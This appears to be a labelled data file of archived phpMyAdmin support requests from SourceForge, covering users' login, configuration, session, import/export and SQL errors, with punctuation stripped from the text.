My original query SELECT ID FACTURE FROM `FACTURES` WHERE ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS COMINAR) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS GM) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS HQ) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS HQL) takes about 10 minutes to execute.
phpmyadmin adds a LIMIT 0, 30 .
When the query is executed, phpmadmin sends the query again with SELECT SQL CALC FOUND ROWS ID FACTURE FROM `FACTURES` WHERE ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS COMINAR ) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS GM ) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS HQ ) AND ID FACTURE NOT IN SELECT ID FACTURE FROM FACTURES ITEMS HQL ) LIMIT 1 ... which takes another 10 minutes.
Can t both action be executed in the same query?
aka LIMIT 0,30 and SQL CALC FOUND ROWS ?
Original URL https sourceforge.net p phpmyadmin support requests 1152 Original author anonymous","bug"
"24444","2974","config question.
Dear all, I am new to the product and do need some help with the config file.
i am installing the phpmyadmin on a remote web server attempting to connect to a database located on another computer.
I know that the access from the webserver to the DB has been granted as anothr product was able to post to the database using provided credentials.
However, the phpmyadmin cannot login to mysql throwing a general error 2003 Cannot log in to the MySQL server Here is the scoop windows IIS 6.0 with phpadmin 3.3.6 my remote installed on another box) mysql server s ip address is 122.128.4.21 dbname = mydatabase Port = 3339 username = myadmin password = mypassword Note that i do not have a root account.
i am only attempting to connect to a particular DB.
Here is my config file lt;?php Generated configuration file Generated by phpMyAdmin 3.3.6 setup script by Piotr Przybylski lt;piotrprz gmail.com gt; Date Tue, 31 Aug 2010 12 54 27 0400 Servers configuration i = 0; Server HLC server [1] i ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ host ] = 122.128.4.21xe2x80x99; cfg[ Servers ][ i][ port ] = 3339; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ auth type ] = xe2x80x98cookie xe2x80x99; cfg[ Servers ][ i][ user ] = myadmin ; cfg[ Servers ][ i][ password ] = mypassword ; cfg[ Servers ][ i][ only db ] = array 0 = gt; HLC , ); cfg[ Servers ][ i][ AllowRoot ] = true; cfg[ Servers ][ i][ AllowNoPassword ] = true; End of servers configuration cfg[ blowfish secret ] = 4c7d336fagtf6.13146430 ; cfg[ DefaultLang ] = en utf 8 ; cfg[ ServerDefault ] = 1; cfg[ UploadDir ] = ; cfg[ SaveDir ] = ; ?
gt; this config file is sittin in the main directory where the index.php is located.
When signing in to the phpmyadmin i am providing the same username and password as abobe and ....
NOTHING.
Error 2003.
Can anyone please help?
it sounds like a simple problem but i have no logs of any sort to track it down.... thanks in advance.
G. Original URL https sourceforge.net p phpmyadmin support requests 1153 Original author gsayenko","bug"
"24444","2975","Cannot start session without errors ....
Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
i get this pretty often, i have to wait 30 40 minutes then it works i have this since 3.3.5 i think it s because i don t log out Original URL https sourceforge.net p phpmyadmin support requests 1154 Original author cybernet2u Found in version Latest Git snapshot","bug"
"24444","2976","Git repository is very large, can be compressed to 64MB.
Hi, I ve tried to install phpMyAdmin from Git, but noticed the repository is quite huge.
The total download was 213MB, unusually large for a git repository.
I expect this is the result of the initial svn gt;git conversion, which didn t optimize the repository files.
After running `git gc aggressive` the repository size is 64MB Could you please get the repository optimized at the server?
Original URL https sourceforge.net p phpmyadmin support requests 1155 Original author codingdomain","bug"
"24444","2977","phpmyadmin does not work with reverse server like nginx etc.
requirements nginx front, port80) Apache backend,port 808) php5.3.3 Authentication type cfg[ Servers ][ i][ auth type ] = cookie ; Server parameters cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; Select mysqli if your server has it cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ AllowNoPassword ] = false; both cookie and http auth type do not work... it will automatically forward to apache port....
Original URL https sourceforge.net p phpmyadmin support requests 1156 Original author renothing","bug"
"24444","2978","Newbie, new installation can t log in.
I have a new installation on Windows 7 Apache 2.2.17 PHP Version 5.3.3 mySQL 5.1.51 phpMyAdmin 3.3.8 cookie authentication PHPMyAdmin login screen appears, when I try to log in to root, I get a blank screen.
I am able to login to root with the same password using the MySQL command line client.
I ve tried clearing cookies, reinstalling, been all over the web for help, but can t get past this.
Thanks for any suggestions.
Original URL https sourceforge.net p phpmyadmin support requests 1157 Original author lzbthmartini","bug"
"24444","2979","Block user from login.
Hi, I have a site running mysql which uses a special www user called www .
I also have some other mysql users, such as eric, david and markus.
I dont want the www user to be able to login with phpmyadmin.
How do I block a user from login?
Regards, Markus!
Original URL https sourceforge.net p phpmyadmin support requests 1158 Original author markusandersson","bug"
"24444","2980","Link to row edit form?.
Is it possible to link to the edit row page tbl change.php) from my web application?
phpMyAdmin requires a token GET parameter.
The idea is to use phpMyAdmin to edit stuff on my site, instead of having to write admin features for that.
Original URL https sourceforge.net p phpmyadmin support requests 1159 Original author the cybershadow","enhancement"
"24444","2981","Newbie Q Reading in backup causes error 1046.
Hi, I am new to phpMyAdmin, and am trying to read a backup of a database from my website on to my localhost machine a laptop running W7).
My file backup.bz2 is 1.7 megs expands to about 14 megs), and I have downloaded it locally, and have attempted to read it through a version of phpMyAdmin 3.3.8.1) which comes with EasyPHP.
So, using the Import interface, I find my database, then select MySQL323 compatability mode version 3.23 is what my host uses), and I get 8 lt; SNIP 8 lt; SNIP Error SQL query Table structure for table `alimentarus comments` DROP TABLE IF EXISTS `alimentarus comments` ; MySQL said Documentation 1046 No database selected 8 lt; SNIP 8 lt; SNIP I don t know why would it be executing a query when all it should be doing is storing my stuff into MySQL.
Phrank Original URL https sourceforge.net p phpmyadmin support requests 1160 Original author psinatra","bug"
"24444","2982","DataBase.
Hello, There is a problem in PhPMyAdmin Area .
We can not export in this section and if file export it is unread able.
.
CSV for MS Excel ,Excel 97 2003 XLS Workbook , Excel 2007 XLSX Workbook We had export weekly before so we can not export this week.
Also I have contacted with Cpanel support and they replied us this Unfortunately, the bug is not in cPanel software, but in the program MyPHPAdmin.
This software is not under our control, and you will need to contact their developers, or use their support system Regards Faraz Original URL https sourceforge.net p phpmyadmin support requests 1162 Original author farazahmed","bug"
"24444","2983","login to remote server w command line, but not phpmyadmin.
I have version 3.3.9 of phpmyadmin running on RHEL, PHP5.3, pointing to two identical MySQL 5.0.77 servers, a test instance and a production instance.
Phpmyadmin is running on the test server, and the connection to localhost via socket works fine.
The connection to a remote server fails, although I can connect using the command line mysql u XXXX h xxx.xxx.xxx.xxx pYYYYYYY For both I\ m using the standard ports and sockets, using the mysqli extension, auth type cookie.
The configuration for the remote machine looks like this cfg[\ Server\ ][ i][\ verbose\ ] = \ New Production Server\ \ ; cfg[\ Server\ ][ i][\ host\ ] = \ xxx.xxx.xxx.xxx\ ; cfg[\ Server\ ][ i][\ port\ ] = \ \ ; cfg[\ Server\ ][ i][\ socket\ ] = \ \ ; cfg[\ Server\ ][ i][\ connect type\ ] = \ tcp\ ; cfg[\ Server\ ][ i][\ extension\ ] = \ mysqli\ ; cfg[\ Server\ ][ i][\ auth type\ ] = \ cookie\ ; I have verbose error reporting turned on and see Warning in .
libraries dbi mysqli.dbi.lib.php 112 mysqli real connect ) HY000 2003) Can\ t connect to MySQL server on \ xxx.xxx.xxx.xxx\ 13) Backtrace .
libraries dbi mysqli.dbi.lib.php 112 mysqli real connect object, string xxx.xxx.xxx.xxx, string XXXX, string YYYYYYYY, string , integer 0, string , integer 0, ) .
libraries common.inc.php 917 PMA DBI connect string XXXX, string YYYYYYY, boolean , ) .
index.php 35 require once .
libraries common.inc.php) Original URL https sourceforge.net p phpmyadmin support requests 1163 Original author tommcg7","bug"
"24444","2984","setting password fails and blocks access.
I m creating a website with Joomla on localhost and I can t log in to phpmyadmin after setting password I followed the defined procedure Entered phpmyadmin priviliges Clicked modify link for root user Set password xxxxxxx and clicked continue Went to phpmyadmin\config.inc.php and changed parameters to Server parameters cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = xxxxxxx ; cfg[ Servers ][ i][ AllowNoPassword ] = false; cfg[ Servers ][ i][ hide db ] = mysql|information schema|phpmyadmin) ; cfg[ Servers ][ i][ compress ] = false; I closed Phpmyadmin and when I try to get in again I get the following error MySQL said 1045 Access denied for user root localhost Using password YES) phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection.
You should check the host, username and password in config.inc.php and make sure that they correspond to the information provided by the MySQL server.
translated from the Spanish version) I use PhpMyAdmin with joomla installed through Easyphp.
When installing Joomla I am asked to create a username and a password for my Data Base with Server = 127.0.0.1 and username = root.
when I put a password for it to be created I can t get by the Step 5 of the Joomla installation.
But when I leave the space empty no password) I can get by Step 5 and install Joomla, but when I opened PhpMyAdmin it says that it is working without a password for root and that is a security problem so I must create a password, so here I am.
I have edited config.inc.php with many options Server Localhost or 127.0.0.1 User root or my Joomla Superadministrator s Username they are different) Password the one created for PhpMyAdmin; the password for the Joomla backend; no password; the word no pxc3xa0ssword ; the word password I even eliminated the Cookie PhpMyAdmin for 127.0.0.1 in the browser s options.
Original URL https sourceforge.net p phpmyadmin support requests 1164 Original author anonymous","bug"
"24444","2985","PMADB Config broken.
The features relying on the pmadb are broken.
Even if all installation steps are done and double checked there are errors about the tables.
pma users exists and has access testes manually) all tables are created using the scripts create tables.sql Original URL https sourceforge.net p phpmyadmin support requests 1165 Original author scandic","bug"
"24444","2986","Entering localhost in config using ssh tunnel doesnt work.
Hello i am running a local installation of phpmyadmin on Ubuntu 11.04 More system information MySQL Server Localhost via UNIX socket Server version 5.1.54 1ubuntu4 Protocol version 10 User root localhost MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.17 Ubuntu) MySQL client version 5.1.54 PHP extension mysqli I am using the program gSTM to set up a ssh tunnel to another server and forwarding the port 3306 to 3307.
Then I edit the file etc phpmyadmin config.inc.php and add the following and everything works just as it should cfg[ Servers ][ i][ verbose ] = Myhostname.com ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = mypassword ; cfg[ Servers ][ i][ port ] = 3307 ; cfg[ Servers ][ i][ host ] = 127.0.0.1 ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; BUT i must write cfg[ Servers ][ i][ host ] = 127.0.0.1 ; IF I write cfg[ Servers ][ i][ host ] = localhost ; it does not work at all that took me like one hour to find out).
may I suggest that phpMyAdmin supports for you to write localhost there as well.
Original URL https sourceforge.net p phpmyadmin support requests 1166 Original author oloflarsson","bug"
"24444","2987","PhpMyAmin installation.
Can someone in the forum.
show me how to get this great software installed on my system am on window os..Thanks Original URL https sourceforge.net p phpmyadmin support requests 1167 Original author olaoye","bug"
"24444","2988","No Clue.
Ok im rather new to php and sql im running windows 7 on a toshiba laptop i have installed phpmyadmin easyPHP PHPdesigner 7 MySQl when i try to lunch phpmyadmin from easyphp i get error 1025 and i would like to know what to,Now from what iv read its sql thats the problem and found out intsalling mysql would slove this problem i installed it to no sucess Any Help On How To get this working,i would be thankfull Regards Nathan Original URL https sourceforge.net p phpmyadmin support requests 1168 Original author whitelazer","bug"
"24444","2989","SQL Parser error.
Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNqNkl2Pk0AUhve28yvOxcaqgQkDZaWYvUB2SjEUkI 144awpUUiLciH0X v0EItxm4lIWHOed9n Xs4M9TzHU0EnoItgUVsF5Y3C3jko8znyA9a7Qch ZI1bM1Gh p6XcVVvKpxnT7j8WgIhkiSDKAgK L9zxIgEyUwWiyrMvkG92c7hFq1 B0sFGRMsz hqkxMRy3xepCj0PXB8DjSD2gEHj5RtZ2X79if4 2kLzTOYRsCzNkLvSVBAxIVjBBLlLt9Nyjt9RWVk6upCl2YYKmz3fNlteQYdtfWpRPQD2HdlOpGv6 ksJrtPCcFSRP0bqKv5VxXeOyKtIq3tVR3cRNDa4PC8fTKZj2A 0EL5O42UTSKzQ5PO8d0x65WzaR Ojox1vGujLN0zzh6b5k4NoPioRNlCdyzLs6SyQRZdBHANWhaFW3JiKFxjgwNPKAOAga FHIggTvO 1Nf7SMdEF81dnh9ZwpKBO KcMIOg57nP eKJ2hRtRwzGybpqjwmu5UqLOGcEY0zoqj3BuDprCMfm rng0h g01ufOqqni7TZbQxhcBAXD4j9w2X5bQGheZJlj1scl9Wgn6S4rvEibt cwFQVCeEHiBTLt OZr98EeUn4lkXrybguE5oQvvPg8a7q9ry50dDHcWiDsb982 ir8BAiVBkg== END CUT BEGIN RAW ERROR C1 C2 LEN 878 879 899 STR SVN Id sqlparser.lib.php 11335 2008 06 21 14 01 54Z lem9 MySQL 5.1.54 rel12.5 log USR OS, AGENT, VER Linux SAFARI 5.0.534 PMA 2.11.8.1 PHP VER,OS 5.2.13 Linux LANG en utf 8 SQL SELECT SQL NO CACHE FROM db crakpass.programs stats PS FORCE INDEX date 3) JOIN db crakpass.users programs campaigns PC ON PS.campaign id = PC.id LEFT JOIN db crakpass.users programs groups PUG ON PUG.id = PC.group id JOIN db crakpass.programs P ON PS.program id = P.id JOIN db crakpass.programs providers PP ON P.program provider id = PP.id LEFT JOIN db crakpass.programs tours PT ON PS.tour id = PT.id JOIN db crakpass.programs goals PG ON PS.goal id = PG.id LEFT JOIN db crakpass.users U ON PS.user id = U.id LEFT JOIN db crakpass.users traffic UT ON PS.user id = UT.user id LEFT JOIN db crakpass.users info UI ON PS.user id = UI.user id WHERE PS.date gt;= 2011 03 01 AND PS.date lt;= 2011 05 26 GROUP BY PS.date, PS.campaign id, PS.tour id, PS.user id, PS.goal id.user id, PS.goal id END RAW SQL query SELECT SQL NO CACHE FROM db crakpass.programs stats PS FORCE INDEX date 3) JOIN db crakpass.users programs campaigns PC ON PS.campaign id = PC.id LEFT JOIN db crakpass.users programs groups PUG ON PUG.id = PC.group id JOIN db crakpass.programs P ON PS.program id = P.id JOIN db crakpass.programs providers PP ON P.program provider id = PP.id LEFT JOIN db crakpass.programs tours PT ON PS.tour id = PT.id JOIN db crakpass.programs goals PG ON PS.goal id = PG.id LEFT JOIN db crakpass.users U ON PS.user id = U.id LEFT JOIN db crakpass.users traffic UT ON PS.user id = UT.user id LEFT JOIN db crakpass.users info UI ON PS.user id = UI.user id WHERE PS.date gt;= 2011 03 01 AND PS.date lt;= 2011 05 26 GROUP BY PS.date, PS.campaign id, PS.tour id, PS.user id, PS.goal id.user id, PS.goal id MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 22 Original URL https sourceforge.net p phpmyadmin support requests 1169 Original author precea","bug"
"24444","2990","Can t see triggers.
Hi, I m new to MySQL and phpMyAdmin so please be gentle with me!
I m trying to create a r=trigger on a table as below which runs fine and phpMyAdmin say s it was successful, however when I run a show triggers no triggers are returned, can anyone help as I must be missing something?
delimiter CREATE TRIGGER jos jd donors ai AFTER INSERT ON jos jd donors FOR EACH ROW BEGIN declare row count integer default 0; select count ) into row count from jos jd donors where campaign id = new.campaign id; if row count gt; 2 then update jos jd campaigns set published = 0 where campaign id = new.campaign id; end if; END delimiter ; Many thanks Andy Original URL https sourceforge.net p phpmyadmin support requests 1170 Original author donoss","bug"
"24444","2991","Cannot browse tables and no sql results.
I cannot browse any table in any of my databases.
Also, the sql window will not return any results from a table.
All I get in either case is a blank screen and no errors.
No errors in web server logs either.
Here is my configuration RHEL 5 Apache 2.2.17 PHP 5.3.6 MySQL 5.5.13 phpMyAdmin 3.4.3.1 using MySqli extension.
I have session, json, and mbstring enabled in PHP and the session is writing to a directory that is writeable by the webserver group.
I have two identicle machines and this is happening on both.
Here is my config.inc.php file lt;?php Generated configuration file Generated by phpMyAdmin 3.4.3.1 setup script Date Wed, 13 Jul 2011 10 40 21 0500 Servers configuration i = 0; Server TTP Development Server [1] i ; cfg[ Servers ][ i][ verbose ] = TTP Development Server ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = 3306 ; cfg[ Servers ][ i][ ssl ] = true; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ compress ] = true; cfg[ Servers ][ i][ auth type ] = cookie ; cfg[ Servers ][ i][ only db ] = array faqs , pmpro ); cfg[ Servers ][ i][ CountTables ] = true; cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ controluser ] = ; cfg[ Servers ][ i][ controlpass ] = ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ userconfig ] = pma userconfig ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ tracking ] = pma tracking ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; End of servers configuration cfg[ blowfish secret ] = ; cfg[ DefaultLang ] = en ; cfg[ ServerDefault ] = 1; cfg[ ForceSSL ] = true; cfg[ QueryHistoryDB ] = true; cfg[ LoginCookieRecall ] = false; cfg[ OBGzip ] = false; ?
gt; Original URL https sourceforge.net p phpmyadmin support requests 1171 Original author jnbutler","bug"
"24444","2992","myphpadmin can not connect to remote mysqlserver...
I tried installing myphpadmin 3.4.3.2 on linux ery apache) and windows IIS 6), every time it tries to connect to localhost MYSQL.
i created config dir and copied config.inc.php and edited the host entry to point to remote SQL server, still it connects to localhost MYSQL.
what more info is needed for this case?
is support for remote MYSQL disabled with this release ?
thx Original URL https sourceforge.net p phpmyadmin support requests 1172 Original author contactgore","bug"
"24444","2993","IE6 Crash.
When attempting to use the edit feature in IE6, browser crashes closes window.
Original URL https sourceforge.net p phpmyadmin support requests 1173 Original author jjpopek","bug"
"24444","2994","Could not login into phpmyadmin..
I could not login even thought I left the user and pass empty.
I tried root as my username and password.
The issues was due too many careless of deleting the privileged and right now this is what happened to me.
Can anyone help me?
Original URL https sourceforge.net p phpmyadmin support requests 1174 Original author nubpro","bug"
"24444","2995","blob data being cleared on update.
I contected Hostgator and they directed me here.
They installed a new version of phpMyAdmin and now I have the following error When I update a record in my database table, the BLOB fields that had existing data in them are updated to , so it deletes anything there.
It looks like this is an old problem that has been fixed in the past, but must have started again in this new version.
Blob fields emptied ID 1006812 ) Thanks for your time.
I appreciate all of your hard work, this is a great product!
Original URL https sourceforge.net p phpmyadmin support requests 1175 Original author apnetworking","bug"
"24444","2996","cannot open phpmyadmin.
I had to change my install port top 85 because 80 was for IIS.
All is working fine.
I log into localhost with localhost 85.
When I get there, I can t open phpmyadmin.
Comes back with page not found.
Also when I go to the wamp icon Localhost and phpmyadmin will not open either.
Original URL https sourceforge.net p phpmyadmin support requests 1176 Original author boydbartley","bug"
"24444","2997","Fresh Installation Cannot start session without errors.
I just installed a fresh Ubuntu 10.04 Server with a default lamp stack.
When trying to log in to phpmyadmin I recieved the error Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
I checked the Apache log but nothing related to php sessions.
When I change the auth type to http or config it allows me to log in, but then I recieve errors when trying to create a database db create.php Missing parameter new db).
I have PHP error reporting set to 1 and other pages using sessions and session variables act normally and produce no errors.
I ve tried googling but haven t found any answers.
Any help is much appreciated.
If more information is needed I can provide it configs etc).
Original URL https sourceforge.net p phpmyadmin support requests 1177 Original author kenn213","bug"
"24444","2998","Can t find the home screen.
When I first installed phpMyAdmin a few weeks ago, I was able to create new databases and everything was fine.
Now when I try to use it, I get the attached screen shot, with repetitions of the database browser.
If I click on Orpheus , I get the full panoply of database options, but I can t get outside this to create new databases.
I ve muddled around inside config.inc.php, but to no avail.
There s something somewhere that I modified unwittingly, but I can t find it.
Original URL https sourceforge.net p phpmyadmin support requests 1178 Original author lauriefleming Found in version Latest Git","bug"
"24444","2999","Unable to disable ajax completely.
I ve tried to completely disable ajax on my local phpMyAdmin installation without any result.
I ve edited config.inc.php to include the following line cfg[ AjaxEnable ] = false; unfortunately, every day when I start working, the settings is ignored and I have to manually update it in settings.
Very annoying.
Many thanks.
Please note, I am using Fedora 14 and the rpm package available from it s repositories.
Original URL https sourceforge.net p phpmyadmin support requests 1179 Original author majkel78 Found in version 3.4.5","bug"
"24444","3000","Privlage errors.
When first installed, there was no login and many databases.
Now there is a login, less databases, and my privileges have been flushed.
Nothing I try allows me to give myself privileges.
Is there a built in account that I may have been on before and if there is how do I access it.
Original URL https sourceforge.net p phpmyadmin support requests 1180 Original author anonymous","bug"
"24444","3001","Getting Configuration Information.
My phpMyAdmin account was set up througa web hosting service for a website.
Now, I am trying to access the database that the service setup without going through phpMyAdmin, but none of the configurations seem to work.
I am using mysql.
Is the host name the server name or the host name?
How do you get the actual name of the database file?
Is the user name just the log in name or is it the user name with the numbers after it?
Original URL https sourceforge.net p phpmyadmin support requests 1181 Original author tnicole","bug"
"24444","3002","Stored Procedure not returning Select Stmt.
result.
In my webhosting environment mentioned below) When I m trying to execute stored procedure on PhpMydadmin which is having a select statement to get data from MYSQL database it is giving error below error.
Error 1312 PROCEDURE hemant04 namdev.Get UserDetails can t return a result set in the given context Environment IMySQL Server Localhost via UNIX socket Server version 5.1.56 Protocol version 10 User hemant04 localhost MySQL charset UTF 8 Unicode utf8) Web server cpsrvd 11.30.6.3 MySQL client version 5.1.56 PHP extension mysql phpMyAdmin Version information 3.4.9 But same stored procedure is running fine in old version on phpMyadmin which is a case in my development machine Development Machine environment MySQL Server localhost via TCP IP Server version 5.5.16 Protocol version 10 User root localhost MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.21 Win32) mod ssl 2.2.21 OpenSSL 1.0.0e PHP 5.3.8 mod perl 2.0.4 Perl v5.10.1 MySQL client version mysqlnd 5.0.8 dev 20102224 Revision 310735 PHP extension mysql phpMyAdmin Version information 3.4.5, latest stable version 3.4.9 Original URL https sourceforge.net p phpmyadmin support requests 1182 Original author hemant04","bug"
"24444","3003","Cannot see after 30 results, cannot create table, or edit ro.
We have a Windows 2008 web server running Plesk.
Everything was working just fine last night but suddenly stopped working today.
PHP and MySQL still work fine, but phpMyAdmin has several issues.
When I go to Browse a Table, it shows me the first 30 results.
But when I try to go to the next page, view 100 rows at a time, or any sort of change, it just refreshes the same exact page instead of showing me different results.
Also, if I try to edit a row, it brings me to the Insert screen instead with nothing filled in.
I also cannot create new tables via phpMyAdmin.
I don t get any error messages.
Tried rebooting the server without any difference.
Some of our server specs Microsoft IIS 7.0 MySQL client version mysqlnd 5.0.8 dev 20102224 Revision 310735 PHP extension mysqli Documentation phpMyAdmin Version information 3.4.9 I m at wits end especially since this was working just fine 24 hours ago and as far as I know nothing has changed at all with the server.
Original URL https sourceforge.net p phpmyadmin support requests 1183 Original author ppark","bug"
"24444","3004","Never get to login screen.
Please see my topic Never get to login screen on the help forum for details.
I am still stumped.
Any suggestions as to something I might try to solve this problem would be great.
According to README the Version 3.4.10.1 on my Freebsd box.
Ed100 Original URL https sourceforge.net p phpmyadmin support requests 1184 Original author ed100 Found in version 3.4.7","bug"
"24444","3005","The phpMyAdmin configuration storage is not completely confi.
I m trying to install a new mybb forum, but I think I need to fix some things in the database in order to be able to continue.
When I log into phpmyadmin I get this message The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
To find out why click here.
When I to find out more I get this message cfg[ Servers ][ i][ pmadb ] ... not OK [ Documentation ] cfg[ Servers ][ i][ relation ] ... not OK [ Documentation ] General relation features Disabled cfg[ Servers ][ i][ table info ] ... not OK [ Documentation ] Display Features Disabled cfg[ Servers ][ i][ table coords ] ... not OK [ Documentation ] cfg[ Servers ][ i][ pdf pages ] ... not OK [ Documentation ] Creation of PDFs Disabled cfg[ Servers ][ i][ column info ] ... not OK [ Documentation ] Displaying Column Comments Disabled Browser transformation Disabled cfg[ Servers ][ i][ bookmarktable ] ... not OK [ Documentation ] Bookmarked SQL query Disabled cfg[ Servers ][ i][ history ] ... not OK [ Documentation ] SQL history Disabled cfg[ Servers ][ i][ designer coords ] ... not OK [ Documentation ] Designer Disabled cfg[ Servers ][ i][ tracking ] ... not OK [ Documentation ] Tracking Disabled cfg[ Servers ][ i][ userconfig ] ... not OK [ Documentation ] User preferences Disabled Quick steps to setup advanced features Create the needed tables with the script create tables.sql.
Create a pma user and give access to these tables.
Enable advanced features in configuration file config.inc.php), for example by starting from config.sample.inc.php.
Re login to phpMyAdmin to load the updated configuration file.
Original URL https sourceforge.net p phpmyadmin support requests 1185 Original author cornelis80","bug"
"24444","3006","Fatal Error.
New install after login I get Fatal error Call to undefined function ) in var www html warnadmin libraries Config.class.php on line 727 so what needs to be fixed Original URL https sourceforge.net p phpmyadmin support requests 1186 Original author k8jslmichigan","bug"
"24444","3007","PDF Export.
How do i Activate the PDF export option.
this is a brand new install and I m new to mysql, so can the awnsers be in very simple terms please using Windows Server 2008) Original URL https sourceforge.net p phpmyadmin support requests 1189 Original author scottbob9","bug"
"24444","3008","Cannot access phpmyadmin 500 error 109 error.
Two separate versions of phpmyadmin on two different ec2 instances each stopped connecting for me today.
Nothing changed for passwords for either version.
Errors indicate it might be a proxy or firewall setting.
I am not using a proxy server and have not made firewall changes.
Any suggestions to troubleshoot?
Thanks Original URL https sourceforge.net p phpmyadmin support requests 1190 Original author dptarrant","bug"
"24444","3009","unable to set configuration.
Greetings, I m trying to set the configuration in order to support multiple servers, extend the cookie time, etc... and I can t find a way to do so.
Tried the setup way, and also the manual configuration of config.inc.php but it seams it doesn t care about that file.
Can you please give us a hint on how to fix this?
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 1191 Original author anonymous","bug"
"24444","3010","502 Gateway error [timeout on phpmyadmin].
i use the danginx plugin on centos 5.8 nginx for directadmin) after reinstall mysql , phpmyadmin shows error when to login in large databases 110mb) 502 Bad Gateway when i disable the danginx ,error Connection closed by remote server shows!
any solution?!
Original URL https sourceforge.net p phpmyadmin support requests 1192 Original author mhm233 Found in version Latest Git","bug"
"24444","3011","Login without a password is forbidden by configuration.
This is a bug in phpMyAdmin.
My MySQL database user has no password, and is thus locked.
I entered no password with allow no password enabled, and I get this error Login without a password is forbidden by configuration see AllowNoPassword) It is a bug.
What s wrong?
Original URL https sourceforge.net p phpmyadmin support requests 1193 Original author bskypim","bug"
"24444","3012","undo save configuration in browser .
I m on shared cPanel hosting and used the save configuration in browser option to store my export preferences.
Every time I launch phpMyAdmin I see a notice at the top of the right frame, asking if I d like to load these settings see screenshot).
Fine and dandy.
Now I need to remove these settings from browser storage but have been unsuccessful in doing so.
Removing cookies for the hosting account does not get rid of the message, nor does clearing cache or any stored form data history.
When I use a different browser I do not see the notice so I know it is in some browser storage someplace.
I need to delete these stored settings altogether, not just reset to defaults.
Where are these settings supposed to be stored?
I m using a recent SeaMonkey nightly build, Firefox 16.0a1 or greater.
thanks for any info Original URL https sourceforge.net p phpmyadmin support requests 1194 Original author kchayka","bug"
"24444","3013","drag to reorder columns.
hello, I want disable the functionality drag to reorder the columns because that can be dramatic when a beginner use it and also when an error drag without seeing it.
Is there a solution or option to disable this feature ?
Thank you, Original URL https sourceforge.net p phpmyadmin support requests 1195 Original author anonymous Found in version Latest Git","bug"
"24444","3014","Upgraded to 3.5.2.2 can no longer browse data!.
I have recently upgraded phpmyadmin on two different servers VPS) from 3.5.1 to 3.5.2.2 However, although at first glance, I can view the data, and attempt to edit it through phpmyadmin just shows a page with empty fields.
If I browse to the next page of data, in both IE9 and Firefox 15, I actually get a repeat of the first page of data slightly below the top of the page see screenshot).
Maybe I needed to do something else when upgrading rather than just copying my old config file across any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 1196 Original author rwap services","bug"
"24444","3015","Is cgi.fix pathinfo = 1 required.
Is the php configuration option `cgi.fix pathinfo` required to be set to `1` for phpMyAdmin to work correctly?
I have phpMyAdmin setup in a directory like http www.mydodmain.com phpMyAdmin With `cgi.fix pathinfo = 0` it loads the login page, but when I click Go the page redirects to http www.mydomain.com index.php?token=B5G0b509eaS8936C7dbW898a58Kclc05 Notice the directory `phpMyAdmin` is missing.
If I set `cgi.fix pathinfo = 1` then things work correctly.
I would really like to ovoid setting `cgi.fix pathinfo = 1` as this is a security issue with nginx and php.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1197 Original author justink101","bug"
"24444","3016","2 decimal places in default field problem.
I have posted this in the forum with no response as yet I believe it may be a bug...
I have a database table containing average daily kilometerage if such a word exists) allowed, and having been done, for, and by, cars in a rental fleet.
I have set up both fields as decimal 11,2) in the type column of the table and have defaulted the allowed field to 82.20 which shows correctly in the Structure Tab of phpMyAdmin but is rounded down to 82.00 in the Browse Tab and subsequently the database itself.
How can I insist on 2 decimal places for fields in my DB, if not by using decimal 11,2) in my Type column?
I m obviously missing something...
Original URL https sourceforge.net p phpmyadmin support requests 1199 Original author jiminjhb","bug"
